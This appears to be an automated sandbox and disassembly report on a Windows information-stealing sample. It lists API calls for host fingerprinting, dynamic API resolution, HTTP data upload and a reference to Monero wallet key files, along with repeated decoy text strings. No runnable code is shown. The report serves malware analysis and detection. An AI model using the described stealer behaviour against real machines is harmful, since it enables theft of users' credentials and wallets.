                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: e5ca1647b0504cc14701e36f90aa6d234e4958a3cd496d758d274f07a3931e61
                                  • Instruction ID: 163abd6a8554feae7ba0a380251820624273db74ec8632675a9ca6ebdcc2e8b0
                                  • Opcode Fuzzy Hash: e5ca1647b0504cc14701e36f90aa6d234e4958a3cd496d758d274f07a3931e61
                                  • Instruction Fuzzy Hash: 1741F4637CA704EACE34BBA4B84EF9D7A965FCAB50F907254EE1062290DBB0751045B2
                                  Function 00E44880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 e44880-e44942 call e5a7a0 call e447b0 call e5a740 * 5 InternetOpenA StrCmpCA 816 e44944 801->816 817 e4494b-e4494f 801->817 816->817 818 e44955-e44acd call e58b60 call e5a920 call e5a8a0 call e5a800 * 2 call e5a9b0 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a920 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a9b0 call e5a920 call e5a8a0 call e5a800 * 2 InternetConnectA 817->818 819 e44ecb-e44ef3 InternetCloseHandle call e5aad0 call e49ac0 817->819 818->819 905 e44ad3-e44ad7 818->905 829 e44ef5-e44f2d call e5a820 call e5a9b0 call e5a8a0 call e5a800 819->829 830 e44f32-e44fa2 call e58990 * 2 call e5a7a0 call e5a800 * 8 819->830 829->830 906 e44ae5 905->906 907 e44ad9-e44ae3 905->907 908 e44aef-e44b22 HttpOpenRequestA 906->908 907->908 909 e44ebe-e44ec5 InternetCloseHandle 908->909 910 e44b28-e44e28 call e5a9b0 call e5a8a0 call e5a800 call e5a920 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a920 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a920 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a9b0 call e5a8a0 call e5a800 call e5a920 call e5a8a0 call e5a800 call e5a740 call e5a920 * 2 call e5a8a0 call e5a800 * 2 call e5aad0 lstrlen call e5aad0 * 2 lstrlen call e5aad0 HttpSendRequestA 908->910 909->819 1021 e44e32-e44e5c InternetReadFile 910->1021 1022 e44e67-e44eb9 InternetCloseHandle call e5a800 1021->1022 1023 e44e5e-e44e65 1021->1023 1022->909 1023->1022 1024 e44e69-e44ea7 call e5a9b0 call e5a8a0 call e5a800 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44839
                                    • Part of subcall function 00E447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44849
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E44915
                                  • StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E4493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E44ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E60DDB,00000000,?,?,00000000,?,",00000000,?,01CBF278), ref: 00E44DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E44E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E44E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E44E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00E44EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00E44EC5
                                  • HttpOpenRequestA.WININET(00000000,01CBF398,?,01CBE7B0,00000000,00000000,00400100,00000000), ref: 00E44B15
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00E44ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: d73541846a052961d4111e67b371b8b608fe708e33a166731f7fa3956d71c039
                                  • Instruction ID: 3b4a2eef7c6c931751dea405709e802f5114374eb63366baa8448ede254c3d94
                                  • Opcode Fuzzy Hash: d73541846a052961d4111e67b371b8b608fe708e33a166731f7fa3956d71c039
                                  • Instruction Fuzzy Hash: 09120B72910218AADB19EB90DC96FEEB3B8BF54301F5456A9B50672091EF302F4DCF61
                                  Function 00E578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E57917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00E5792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 898634258535f27605333821e63df29c6cb41a02b19dbae0f525cc80d20bdc8d
                                  • Instruction ID: a7c516a18fa88b24245f24e18f7aa440b4b379efb867506dd05056493353d163
                                  • Opcode Fuzzy Hash: 898634258535f27605333821e63df29c6cb41a02b19dbae0f525cc80d20bdc8d
                                  • Instruction Fuzzy Hash: 870186B1A48204EBC750DF94D945FAEFBB8F744B21F10461AFA85F3680C37959048BB1
                                  Function 00E57850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E57887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E5789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: d5309c9b28e5b0de81a19a0b11a5ade630d21fab261825e98cc6d422e3846a35
                                  • Instruction ID: 9b9eb9cae73bfd555ac9e24c21340174466292f71cbdbae5ab2567af0211762f
                                  • Opcode Fuzzy Hash: d5309c9b28e5b0de81a19a0b11a5ade630d21fab261825e98cc6d422e3846a35
                                  • Instruction Fuzzy Hash: 60F04FB1E48208EBC714DF98DD49BAEBBB8FB04721F10065AFA45A3680C77915048BA1
                                  Function 01248B89 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 180COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID: 7T{
                                  • API String ID: 2962429428-3012325311
                                  • Opcode ID: b2339aa747815183a94f7903a93ea14f202dfecdbba8577223abd13584acdf8c
                                  • Instruction ID: e06656712e1f1a57d11727a4dc8d9f6d46a71c73ebdc601fbc1b7c96e369d370
                                  • Opcode Fuzzy Hash: b2339aa747815183a94f7903a93ea14f202dfecdbba8577223abd13584acdf8c
                                  • Instruction Fuzzy Hash: F251D7F252D310AFD3096E59DC416BABBE9EF94730F15482EE6C5C3210E77149409B9B
                                  Function 00E41160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: b7b715866fc0817c43572c08caee4b70b4eac44ff25a9b7d5f7012da23b6dea0
                                  • Instruction ID: b96784bacb48a96aa432a6421d0e5a4f1f6a9f2b6bdf8dc957a896f8dd9381b6
                                  • Opcode Fuzzy Hash: b7b715866fc0817c43572c08caee4b70b4eac44ff25a9b7d5f7012da23b6dea0
                                  • Instruction Fuzzy Hash: 37D05E74E0430CDBCB10EFE0D8496DDBB78FB08311F001595D94673740EA355481CBA5
                                  Function 00E59C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 e59c10-e59c1a 634 e5a036-e5a0ca LoadLibraryA * 8 633->634 635 e59c20-e5a031 GetProcAddress * 43 633->635 636 e5a146-e5a14d 634->636 637 e5a0cc-e5a141 GetProcAddress * 5 634->637 635->634 638 e5a216-e5a21d 636->638 639 e5a153-e5a211 GetProcAddress * 8 636->639 637->636 640 e5a21f-e5a293 GetProcAddress * 5 638->640 641 e5a298-e5a29f 638->641 639->638 640->641 642 e5a2a5-e5a332 GetProcAddress * 6 641->642 643 e5a337-e5a33e 641->643 642->643 644 e5a344-e5a41a GetProcAddress * 9 643->644 645 e5a41f-e5a426 643->645 644->645 646 e5a4a2-e5a4a9 645->646 647 e5a428-e5a49d GetProcAddress * 5 645->647 648 e5a4dc-e5a4e3 646->648 649 e5a4ab-e5a4d7 GetProcAddress * 2 646->649 647->646 650 e5a515-e5a51c 648->650 651 e5a4e5-e5a510 GetProcAddress * 2 648->651 649->648 652 e5a612-e5a619 650->652 653 e5a522-e5a60d GetProcAddress * 10 650->653 651->650 654 e5a67d-e5a684 652->654 655 e5a61b-e5a678 GetProcAddress * 4 652->655 653->652 656 e5a686-e5a699 GetProcAddress 654->656 657 e5a69e-e5a6a5 654->657 655->654 656->657 658 e5a6a7-e5a703 GetProcAddress * 4 657->658 659 e5a708-e5a709 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01CA6680), ref: 00E59C2D
                                  • GetProcAddress.KERNEL32(75900000,01CA66A0), ref: 00E59C45
                                  • GetProcAddress.KERNEL32(75900000,01CB9F10), ref: 00E59C5E
                                  • GetProcAddress.KERNEL32(75900000,01CB9E68), ref: 00E59C76
                                  • GetProcAddress.KERNEL32(75900000,01CBD788), ref: 00E59C8E
                                  • GetProcAddress.KERNEL32(75900000,01CBD7E8), ref: 00E59CA7
                                  • GetProcAddress.KERNEL32(75900000,01CABF30), ref: 00E59CBF
                                  • GetProcAddress.KERNEL32(75900000,01CBD5F0), ref: 00E59CD7
                                  • GetProcAddress.KERNEL32(75900000,01CBD710), ref: 00E59CF0
                                  • GetProcAddress.KERNEL32(75900000,01CBD890), ref: 00E59D08
                                  • GetProcAddress.KERNEL32(75900000,01CBD848), ref: 00E59D20
                                  • GetProcAddress.KERNEL32(75900000,01CA67E0), ref: 00E59D39
                                  • GetProcAddress.KERNEL32(75900000,01CA6900), ref: 00E59D51
                                  • GetProcAddress.KERNEL32(75900000,01CA6760), ref: 00E59D69
                                  • GetProcAddress.KERNEL32(75900000,01CA6780), ref: 00E59D82
                                  • GetProcAddress.KERNEL32(75900000,01CBD728), ref: 00E59D9A
                                  • GetProcAddress.KERNEL32(75900000,01CBD6F8), ref: 00E59DB2
                                  • GetProcAddress.KERNEL32(75900000,01CABE68), ref: 00E59DCB
                                  • GetProcAddress.KERNEL32(75900000,01CA6800), ref: 00E59DE3
                                  • GetProcAddress.KERNEL32(75900000,01CBD740), ref: 00E59DFB
                                  • GetProcAddress.KERNEL32(75900000,01CBD608), ref: 00E59E14
                                  • GetProcAddress.KERNEL32(75900000,01CBD758), ref: 00E59E2C
                                  • GetProcAddress.KERNEL32(75900000,01CBD770), ref: 00E59E44
                                  • GetProcAddress.KERNEL32(75900000,01CA6820), ref: 00E59E5D
                                  • GetProcAddress.KERNEL32(75900000,01CBD650), ref: 00E59E75
                                  • GetProcAddress.KERNEL32(75900000,01CBD620), ref: 00E59E8D
                                  • GetProcAddress.KERNEL32(75900000,01CBD8A8), ref: 00E59EA6
                                  • GetProcAddress.KERNEL32(75900000,01CBD7D0), ref: 00E59EBE
                                  • GetProcAddress.KERNEL32(75900000,01CBD7A0), ref: 00E59ED6
                                  • GetProcAddress.KERNEL32(75900000,01CBD818), ref: 00E59EEF
                                  • GetProcAddress.KERNEL32(75900000,01CBD6C8), ref: 00E59F07
                                  • GetProcAddress.KERNEL32(75900000,01CBD638), ref: 00E59F1F
                                  • GetProcAddress.KERNEL32(75900000,01CBD6B0), ref: 00E59F38
                                  • GetProcAddress.KERNEL32(75900000,01CBADC0), ref: 00E59F50
                                  • GetProcAddress.KERNEL32(75900000,01CBD830), ref: 00E59F68
                                  • GetProcAddress.KERNEL32(75900000,01CBD668), ref: 00E59F81
                                  • GetProcAddress.KERNEL32(75900000,01CA68E0), ref: 00E59F99
                                  • GetProcAddress.KERNEL32(75900000,01CBD6E0), ref: 00E59FB1
                                  • GetProcAddress.KERNEL32(75900000,01CA6920), ref: 00E59FCA
                                  • GetProcAddress.KERNEL32(75900000,01CBD680), ref: 00E59FE2
                                  • GetProcAddress.KERNEL32(75900000,01CBD800), ref: 00E59FFA
                                  • GetProcAddress.KERNEL32(75900000,01CA6480), ref: 00E5A013
                                  • GetProcAddress.KERNEL32(75900000,01CA65A0), ref: 00E5A02B
                                  • LoadLibraryA.KERNEL32(01CBD8C0,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A03D
                                  • LoadLibraryA.KERNEL32(01CBD698,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A04E
                                  • LoadLibraryA.KERNEL32(01CBD860,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A060
                                  • LoadLibraryA.KERNEL32(01CBD878,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A072
                                  • LoadLibraryA.KERNEL32(01CBD7B8,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A083
                                  • LoadLibraryA.KERNEL32(01CBD8D8,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A095
                                  • LoadLibraryA.KERNEL32(01CBD9E0,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A0A7
                                  • LoadLibraryA.KERNEL32(01CBDA58,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A0B8
                                  • GetProcAddress.KERNEL32(75FD0000,01CA64C0), ref: 00E5A0DA
                                  • GetProcAddress.KERNEL32(75FD0000,01CBD968), ref: 00E5A0F2
                                  • GetProcAddress.KERNEL32(75FD0000,01CB9B10), ref: 00E5A10A
                                  • GetProcAddress.KERNEL32(75FD0000,01CBDB78), ref: 00E5A123
                                  • GetProcAddress.KERNEL32(75FD0000,01CA65E0), ref: 00E5A13B
